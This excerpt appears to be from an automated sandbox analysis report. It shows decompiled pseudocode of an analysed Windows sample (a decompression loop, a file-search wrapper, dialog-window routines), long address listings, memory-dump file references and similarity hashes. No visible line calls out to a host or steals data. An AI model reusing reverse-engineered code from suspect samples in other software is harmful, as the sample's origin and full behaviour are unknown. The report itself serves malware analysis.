							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                    0x00000000
                                    0x00406d5f
                                    0x00406d5f
                                    0x00406d64
                                    0x00406ddb
                                    0x00406de2
                                    0x00406dec
                                    0x004073cb
                                    0x004073cb
                                    0x004073ce
                                    0x004073ce
                                    0x004073d4
                                    0x004073da
                                    0x004073e0
                                    0x004073fa
                                    0x004073fd
                                    0x00407403
                                    0x0040740e
                                    0x00407410
                                    0x004073e2
                                    0x004073e2
                                    0x004073f1
                                    0x004073f5
                                    0x004073f5
                                    0x0040741a
                                    0x00407441
                                    0x00407441
                                    0x00407447
                                    0x00407447
                                    0x00000000
                                    0x0040741c
                                    0x0040741c
                                    0x00407420
                                    0x004075cf
                                    0x00000000
                                    0x004075cf
                                    0x0040742c
                                    0x00407433
                                    0x0040743b
                                    0x0040743e
                                    0x00000000
                                    0x0040743e
                                    0x00406d66
                                    0x00406d66
                                    0x00406d6a
                                    0x00406d72
                                    0x00406d75
                                    0x00406d77
                                    0x00406d7a
                                    0x00406d7c
                                    0x00406d81
                                    0x00406d84
                                    0x00406d8b
                                    0x00406d92
                                    0x00406d95
                                    0x00406da0
                                    0x00406da8
                                    0x00406da8
                                    0x00406da2
                                    0x00406da2
                                    0x00406da2
                                    0x00406d97
                                    0x00406d97
                                    0x00406d97
                                    0x00406daf
                                    0x00406dcd
                                    0x00406dcf
                                    0x00406fa2
                                    0x00406fa2
                                    0x00406fa5
                                    0x00406fa8
                                    0x00406fab
                                    0x00406fae
                                    0x00406fb1
                                    0x00406fb4
                                    0x00406fb7
                                    0x00406fba
                                    0x00406fc0
                                    0x00406fd8
                                    0x00406fdb
                                    0x00406fde
                                    0x00406fe1
                                    0x00406fe1
                                    0x00406fe4
                                    0x00406fea
                                    0x00406fc2
                                    0x00406fc2
                                    0x00406fca
                                    0x00406fcf
                                    0x00406fd1
                                    0x00406fd3
                                    0x00406fd3
                                    0x00406ff4
                                    0x00406ff7
                                    0x00406f9a
                                    0x00406fa0
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406ff9
                                    0x00406f75
                                    0x00406f79
                                    0x00407581
                                    0x00000000
                                    0x00407581
                                    0x00406f7f
                                    0x00406f82
                                    0x00406f85
                                    0x00406f89
                                    0x00406f8c
                                    0x00406f92
                                    0x00406f94
                                    0x00406f94
                                    0x00406f97
                                    0x00000000
                                    0x00406f97
                                    0x00406db1
                                    0x00406db1
                                    0x00406db4
                                    0x00406dba
                                    0x00406dbc
                                    0x00406dbc
                                    0x00406dbf
                                    0x00406dc2
                                    0x00406dc4
                                    0x00406dc5
                                    0x00406dc8
                                    0x00406e35
                                    0x00406e35
                                    0x00406e39
                                    0x00406e3c
                                    0x00406e3f
                                    0x00406e42
                                    0x00406e45
                                    0x00406e46
                                    0x00406e49
                                    0x00406e4b
                                    0x00406e51
                                    0x00406e54
                                    0x00406e57
                                    0x00406e5a
                                    0x00406e5d
                                    0x00406e63
                                    0x00406e7f
                                    0x00406e82
                                    0x00406e85
                                    0x00406e88
                                    0x00406e8f
                                    0x00406e95
                                    0x00406e99
                                    0x00406e65
                                    0x00406e65
                                    0x00406e69
                                    0x00406e71
                                    0x00406e76
                                    0x00406e78
                                    0x00406e7a
                                    0x00406e7a
                                    0x00406ea3
                                    0x00406ea6
                                    0x00406e1d
                                    0x00406e1d
                                    0x00406e23
                                    0x00406ed6
                                    0x00406edc
                                    0x00000000
                                    0x00000000
                                    0x00406ede
                                    0x00406ee1
                                    0x00406ee4
                                    0x00406ee7
                                    0x00406eea
                                    0x00406eed
                                    0x00406ef0
                                    0x00406ef3
                                    0x00406ef6
                                    0x00406efc
                                    0x00406f14
                                    0x00406f17
                                    0x00406f1a
                                    0x00406f1d
                                    0x00406f1d
                                    0x00406f20
                                    0x00406f26
                                    0x00406efe
                                    0x00406efe
                                    0x00406f06
                                    0x00406f0b
                                    0x00406f0d
                                    0x00406f0f
                                    0x00406f0f
                                    0x00406f30
                                    0x00406f33
                                    0x00406eb1
                                    0x00406eb5
                                    0x00407575
                                    0x00000000
                                    0x00407575
                                    0x00406ebb
                                    0x00406ebe
                                    0x00406ec1
                                    0x00406ec5
                                    0x00406ec8
                                    0x00406ece
                                    0x00406ed0
                                    0x00406ed0
                                    0x00406ed3
                                    0x00406ed3
                                    0x00406f33
                                    0x00406f3a
                                    0x00406f3a
                                    0x00406f3a
                                    0x00406f3e
                                    0x00406f3e
                                    0x00406f41
                                    0x00406f44
                                    0x00406f48
                                    0x0040758d
                                    0x00000000
                                    0x0040758d
                                    0x00406f4e
                                    0x00406f51
                                    0x00406f54
                                    0x00406f57
                                    0x00406f5a
                                    0x00406f5d
                                    0x00406f60
                                    0x00406f62
                                    0x00406f65
                                    0x00406f68
                                    0x00406f6b
                                    0x00406f6d
                                    0x00406f6d
                                    0x00406f6d
                                    0x0040710a
                                    0x0040710a
                                    0x0040710d
                                    0x0040710d
                                    0x00000000
                                    0x0040710d
                                    0x00406e2f
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406eac
                                    0x00406df8
                                    0x00406dfc
                                    0x00407569
                                    0x004075e5
                                    0x004075ed
                                    0x004075f4
                                    0x004075f6
                                    0x004075fd
                                    0x00407601
                                    0x00407601
                                    0x00406e02
                                    0x00406e05
                                    0x00406e08
                                    0x00406e0c
                                    0x00406e0f
                                    0x00406e15
                                    0x00406e17
                                    0x00406e17
                                    0x00406e1a
                                    0x00000000
                                    0x00406e1a
                                    0x00406ea6
                                    0x00406daf
                                    0x00406be3
                                    0x00406be3
                                    0x00406bec
                                    0x004075fa
                                    0x004075fa
                                    0x00000000
                                    0x004075fa
                                    0x00406bf2
                                    0x00000000
                                    0x00406bfd
                                    0x00000000
                                    0x00000000
                                    0x00406c06
                                    0x00406c09
                                    0x00406c0c
                                    0x00406c10
                                    0x00000000
                                    0x00000000
                                    0x00406c16
                                    0x00406c19
                                    0x00406c1b
                                    0x00406c1c
                                    0x00406c1f
                                    0x00406c21
                                    0x00406c22
                                    0x00406c24
                                    0x00406c27
                                    0x00406c2c
                                    0x00406c31
                                    0x00406c3a
                                    0x00406c4d
                                    0x00406c50
                                    0x00406c5c
                                    0x00406c84
                                    0x00406c86
                                    0x00406c94
                                    0x00406c94
                                    0x00406c98
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406c88
                                    0x00406c88
                                    0x00406c8b
                                    0x00406c8c
                                    0x00406c8c
                                    0x00000000
                                    0x00406c88
                                    0x00406c62
                                    0x00406c67
                                    0x00406c67
                                    0x00406c70
                                    0x00406c78
                                    0x00406c7b
                                    0x00000000
                                    0x00406c81
                                    0x00406c81
                                    0x00000000
                                    0x00406c81
                                    0x00000000
                                    0x00406c9e
                                    0x00406c9e
                                    0x00406ca2
                                    0x0040754e
                                    0x00000000
                                    0x0040754e
                                    0x00406cab
                                    0x00406cbb
                                    0x00406cbe
                                    0x00406cc1
                                    0x00406cc1
                                    0x00406cc1
                                    0x00406cc4
                                    0x00406cc8
                                    0x00000000
                                    0x00000000
                                    0x00406cca
                                    0x00406cd0
                                    0x00406cfa
                                    0x00406d00
                                    0x00406d07
                                    0x00000000
                                    0x00406d07
                                    0x00406cd6
                                    0x00406cd9
                                    0x00406cde
                                    0x00406cde
                                    0x00406ce9
                                    0x00406cf1
                                    0x00406cf4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406d39
                                    0x00406d3f
                                    0x00406d42
                                    0x00406d4f
                                    0x00406d57
                                    0x00000000
                                    0x00000000
                                    0x00406d0e
                                    0x00406d0e
                                    0x00406d12
                                    0x0040755d
                                    0x00000000
                                    0x0040755d
                                    0x00406d1e
                                    0x00406d29
                                    0x00406d29
                                    0x00406d29
                                    0x00406d2c
                                    0x00406d2f
                                    0x00406d32
                                    0x00406d37
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406ffe
                                    0x00407002
                                    0x00407020
                                    0x00407023
                                    0x0040702a
                                    0x0040702d
                                    0x00407030
                                    0x00407033
                                    0x00407036
                                    0x00407039
                                    0x0040703b
                                    0x00407042
                                    0x00407043
                                    0x00407045
                                    0x00407048
                                    0x0040704b
                                    0x0040704e
                                    0x0040704e
                                    0x00407053
                                    0x00000000
                                    0x00407053
                                    0x00407004
                                    0x00407007
                                    0x0040700a
                                    0x00407014
                                    0x00000000
                                    0x00000000
                                    0x00407068
                                    0x0040706c
                                    0x0040708f
                                    0x00407092
                                    0x00407095
                                    0x0040709f
                                    0x0040706e
                                    0x0040706e
                                    0x00407071
                                    0x00407074
                                    0x00407077
                                    0x00407084
                                    0x00407087
                                    0x00407087
                                    0x00000000
                                    0x00000000
                                    0x004070ab
                                    0x004070af
                                    0x00000000
                                    0x00000000
                                    0x004070b5
                                    0x004070b9
                                    0x00000000
                                    0x00000000
                                    0x004070bf
                                    0x004070c1
                                    0x004070c5
                                    0x004070c5
                                    0x004070c8
                                    0x004070cc
                                    0x00000000
                                    0x00000000
                                    0x0040711c
                                    0x00407120
                                    0x00407127
                                    0x0040712a
                                    0x0040712d
                                    0x00407137
                                    0x00000000
                                    0x00407137
                                    0x00407122
                                    0x00000000
                                    0x00000000
                                    0x00407143
                                    0x00407147
                                    0x0040714e
                                    0x00407151
                                    0x00407154
                                    0x00407149
                                    0x00407149
                                    0x00407149
                                    0x00407157
                                    0x0040715a
                                    0x0040715d
                                    0x0040715d
                                    0x00407160
                                    0x00407163
                                    0x00407166
                                    0x00407166
                                    0x00407169
                                    0x00407170
                                    0x00407175
                                    0x00000000
                                    0x00000000
                                    0x00407203
                                    0x00407203
                                    0x00407207
                                    0x004075a5
                                    0x00000000
                                    0x004075a5
                                    0x0040720d
                                    0x00407210
                                    0x00407213
                                    0x00407217
                                    0x0040721a
                                    0x00407220
                                    0x00407222
                                    0x00407222
                                    0x00407222
                                    0x00407225
                                    0x00407228
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00407286
                                    0x00407286
                                    0x0040728a
                                    0x004075b1
                                    0x00000000
                                    0x004075b1
                                    0x00407290
                                    0x00407293
                                    0x00407296
                                    0x0040729a
                                    0x0040729d
                                    0x004072a3
                                    0x004072a5
                                    0x004072a5
                                    0x004072a5
                                    0x004072a8
                                    0x00000000
                                    0x00000000
                                    0x00407056
                                    0x00407056
                                    0x00407059
                                    0x00000000
                                    0x00000000
                                    0x00407395
                                    0x00407399
                                    0x004073bb
                                    0x004073be
                                    0x004073c8
                                    0x00000000
                                    0x004073c8
                                    0x0040739b
                                    0x0040739e
                                    0x004073a2
                                    0x004073a5
                                    0x004073a5
                                    0x004073a8
                                    0x00000000
                                    0x00000000
                                    0x00407452
                                    0x00407456
                                    0x00407474
                                    0x00407474
                                    0x00407474
                                    0x0040747b
                                    0x00407482
                                    0x00407489
                                    0x00407489
                                    0x00000000
                                    0x00407489
                                    0x00407458
                                    0x0040745b
                                    0x0040745e
                                    0x00407461
                                    0x00407468
                                    0x004073ac
                                    0x004073ac
                                    0x004073af
                                    0x00000000
                                    0x00000000
                                    0x00407543
                                    0x00407546
                                    0x00000000
                                    0x00000000
                                    0x0040717d
                                    0x0040717f
                                    0x00407186
                                    0x00407187
                                    0x00407189
                                    0x0040718c
                                    0x00000000
                                    0x00000000
                                    0x00407194
                                    0x00407197
                                    0x0040719a
                                    0x0040719c
                                    0x0040719e
                                    0x0040719e
                                    0x0040719f
                                    0x004071a2
                                    0x004071a9
                                    0x004071ac
                                    0x004071ba
                                    0x00000000
                                    0x00000000
                                    0x00407490
                                    0x00407490
                                    0x00407493
                                    0x0040749a
                                    0x00000000
                                    0x00000000
                                    0x0040749f
                                    0x0040749f
                                    0x004074a3
                                    0x004075db
                                    0x00000000
                                    0x004075db
                                    0x004074a9
                                    0x004074ac
                                    0x004074af
                                    0x004074b3
                                    0x004074b6
                                    0x004074bc
                                    0x004074be
                                    0x004074be
                                    0x004074be
                                    0x004074c1
                                    0x004074c4
                                    0x004074c4
                                    0x004074c4
                                    0x004074c4
                                    0x004074c7
                                    0x004074c7
                                    0x004074cb
                                    0x0040752b
                                    0x0040752e
                                    0x00407533
                                    0x00407534
                                    0x00407536
                                    0x00407538
                                    0x0040753b
                                    0x00000000
                                    0x0040753b
                                    0x004074cd
                                    0x004074d3
                                    0x004074d6
                                    0x004074d9
                                    0x004074dc
                                    0x004074df
                                    0x004074e2
                                    0x004074e5
                                    0x004074e8
                                    0x004074eb
                                    0x004074ee
                                    0x00407507
                                    0x0040750a
                                    0x0040750d
                                    0x00407510
                                    0x00407514
                                    0x00407516
                                    0x00407516
                                    0x00407517
                                    0x0040751a
                                    0x004074f0
                                    0x004074f0
                                    0x004074f8
                                    0x004074fd
                                    0x004074ff
                                    0x00407502
                                    0x00407502
                                    0x0040751d
                                    0x00407524
                                    0x00000000
                                    0x00407526
                                    0x00000000
                                    0x00407526
                                    0x00000000
                                    0x004071c2
                                    0x004071c5
                                    0x004071fb
                                    0x0040732b
                                    0x0040732b
                                    0x0040732b
                                    0x0040732b
                                    0x0040732e
                                    0x0040732e
                                    0x00407331
                                    0x00407333
                                    0x004075bd
                                    0x00000000
                                    0x004075bd
                                    0x00407339
                                    0x0040733c
                                    0x00000000
                                    0x00000000
                                    0x00407342
                                    0x00407346
                                    0x00407349
                                    0x00407349
                                    0x00407349
                                    0x00000000
                                    0x00407349
                                    0x004071c7
                                    0x004071c9
                                    0x004071cb
                                    0x004071cd
                                    0x004071d0
                                    0x004071d1
                                    0x004071d3
                                    0x004071d5
                                    0x004071d8
                                    0x004071db
                                    0x004071f1
                                    0x004071f6
                                    0x0040722e
                                    0x0040722e
                                    0x00407232
                                    0x0040725e
                                    0x00407260
                                    0x00407267
                                    0x0040726a
                                    0x0040726d
                                    0x0040726d
                                    0x00407272
                                    0x00407272
                                    0x00407274
                                    0x00407277
                                    0x0040727e
                                    0x00407281
                                    0x004072ae
                                    0x004072ae
                                    0x004072b1
                                    0x004072b4
                                    0x00407328
                                    0x00407328
                                    0x00407328
                                    0x00000000
                                    0x00407328
                                    0x004072b6
                                    0x004072bc
                                    0x004072bf
                                    0x004072c2
                                    0x004072c5
                                    0x004072c8
                                    0x004072cb
                                    0x004072ce
                                    0x004072d1
                                    0x004072d4
                                    0x004072d7
                                    0x004072f0
                                    0x004072f2
                                    0x004072f5
                                    0x004072f6
                                    0x004072f9
                                    0x004072fb
                                    0x004072fe
                                    0x00407300
                                    0x00407302
                                    0x00407305
                                    0x00407307
                                    0x0040730a
                                    0x0040730e
                                    0x00407310
                                    0x00407310
                                    0x00407311
                                    0x00407314
                                    0x00407317
                                    0x004072d9
                                    0x004072d9
                                    0x004072e1
                                    0x004072e6
                                    0x004072e8
                                    0x004072eb
                                    0x004072eb
                                    0x0040731a
                                    0x00407321
                                    0x004072ab
                                    0x004072ab
                                    0x004072ab
                                    0x004072ab
                                    0x00000000
                                    0x00407323
                                    0x00000000
                                    0x00407323
                                    0x00407321
                                    0x00407234
                                    0x00407237
                                    0x00407239
                                    0x0040723c
                                    0x0040723f
                                    0x00407242
                                    0x00407244
                                    0x00407247
                                    0x0040724a
                                    0x0040724a
                                    0x0040724d
                                    0x0040724d
                                    0x00407250
                                    0x00407257
                                    0x0040722b
                                    0x0040722b
                                    0x0040722b
                                    0x0040722b
                                    0x00000000
                                    0x00407259
                                    0x00000000
                                    0x00407259
                                    0x00407257
                                    0x004071dd
                                    0x004071e0
                                    0x004071e2
                                    0x004071e5
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004070cf
                                    0x004070cf
                                    0x004070d3
                                    0x00407599
                                    0x00000000
                                    0x00407599
                                    0x004070d9
                                    0x004070dc
                                    0x004070df
                                    0x004070e2
                                    0x004070e4
                                    0x004070e4
                                    0x004070e4
                                    0x004070e7
                                    0x004070ea
                                    0x004070ed
                                    0x004070f0
                                    0x004070f3
                                    0x004070f6
                                    0x004070f7
                                    0x004070f9
                                    0x004070f9
                                    0x004070f9
                                    0x004070fc
                                    0x004070ff
                                    0x00407102
                                    0x00407105
                                    0x00407105
                                    0x00407105
                                    0x00407108
                                    0x00000000
                                    0x00000000
                                    0x0040734c
                                    0x0040734c
                                    0x0040734c
                                    0x00407350
                                    0x00000000
                                    0x00000000
                                    0x00407356
                                    0x00407359
                                    0x0040735c
                                    0x0040735f
                                    0x00407361
                                    0x00407361
                                    0x00407361
                                    0x00407364
                                    0x00407367
                                    0x0040736a
                                    0x0040736d
                                    0x00407370
                                    0x00407373
                                    0x00407374
                                    0x00407376
                                    0x00407376
                                    0x00407376
                                    0x00407379
                                    0x0040737c
                                    0x0040737f
                                    0x00407382
                                    0x00407385
                                    0x00407389
                                    0x0040738b
                                    0x0040738e
                                    0x00000000
                                    0x00407390
                                    0x00000000
                                    0x00407390
                                    0x0040738e
                                    0x004075c3
                                    0x00000000
                                    0x00000000
                                    0x00406bf2

                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                    • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                    • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                    • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}




                                    0x004069a9
                                    0x004069b2
                                    0x00000000
                                    0x004069bf
                                    0x004069b5
                                    0x00000000

                                    APIs
                                    • FindFirstFileW.KERNELBASE(7556D4C4,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,7556D4C4,?,755513E0,00405D94,?,7556D4C4,755513E0), ref: 004069A9
                                    • FindClose.KERNEL32(00000000), ref: 004069B5
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                    • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                    • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                    • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 141 4040c5-4040d7 142 4040dd-4040e3 141->142 143 40423e-40424d 141->143 142->143 144 4040e9-4040f2 142->144 145 40429c-4042b1 143->145 146 40424f-404297 GetDlgItem * 2 call 4045c4 SetClassLongW call 40140b 143->146 149 4040f4-404101 SetWindowPos 144->149 150 404107-40410e 144->150 147 4042f1-4042f6 call 404610 145->147 148 4042b3-4042b6 145->148 146->145 163 4042fb-404316 147->163 152 4042b8-4042c3 call 401389 148->152 153 4042e9-4042eb 148->153 149->150 155 404110-40412a ShowWindow 150->155 156 404152-404158 150->156 152->153 177 4042c5-4042e4 SendMessageW 152->177 153->147 162 404591 153->162 164 404130-404143 GetWindowLongW 155->164 165 40422b-404239 call 40462b 155->165 158 404171-404174 156->158 159 40415a-40416c DestroyWindow 156->159 169 404176-404182 SetWindowLongW 158->169 170 404187-40418d 158->170 166 40456e-404574 159->166 168 404593-40459a 162->168 173 404318-40431a call 40140b 163->173 174 40431f-404325 163->174 164->165 175 404149-40414c ShowWindow 164->175 165->168 166->162 180 404576-40457c 166->180 169->168 170->165 176 404193-4041a2 GetDlgItem 170->176 173->174 181 40432b-404336 174->181 182 40454f-404568 DestroyWindow EndDialog 174->182 175->156 184 4041c1-4041c4 176->184 185 4041a4-4041bb SendMessageW IsWindowEnabled 176->185 177->168 180->162 186 40457e-404587 ShowWindow 180->186 181->182 183 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 181->183 182->166 213 404393-4043cf ShowWindow EnableWindow call 4045e6 EnableWindow 183->213 214 40438b-404390 183->214 188 4041c6-4041c7 184->188 189 4041c9-4041cc 184->189 185->162 185->184 186->162 191 4041f7-4041fc call 40459d 188->191 192 4041da-4041df 189->192 193 4041ce-4041d4 189->193 191->165 196 404215-404225 SendMessageW 192->196 198 4041e1-4041e7 192->198 193->196 197 4041d6-4041d8 193->197 196->165 197->191 201 4041e9-4041ef call 40140b 198->201 202 4041fe-404207 call 40140b 198->202 209 4041f5 201->209 202->165 211 404209-404213 202->211 209->191 211->209 217 4043d1-4043d2 213->217 218 4043d4 213->218 214->213 219 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 404406-404417 SendMessageW 219->220 221 404419 219->221 222 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 220->222 221->222 222->163 233 404464-404466 222->233 233->163 234 40446c-404470 233->234 235 404472-404478 234->235 236 40448f-4044a3 DestroyWindow 234->236 235->162 237 40447e-404484 235->237 236->166 238 4044a9-4044d6 CreateDialogParamW 236->238 237->163 239 40448a 237->239 238->166 240 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->162 240->162 245 404535-40454d ShowWindow call 404610 240->245 245->166
                                    C-Code - Quality: 84%
                                    			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t145;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x423730 = _t34;
					if(_t130 == 0x110) {
						 *0x42a268 = _t127;
						 *0x423744 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429248);
						 *0x42922c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x42a284;
							if(_t38 ==  *0x42a284) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ec - _t136;
							_v28 = _t48;
							if( *0x42a2ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x421710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004045F9();
							E00406668(0x423748, E004040A6());
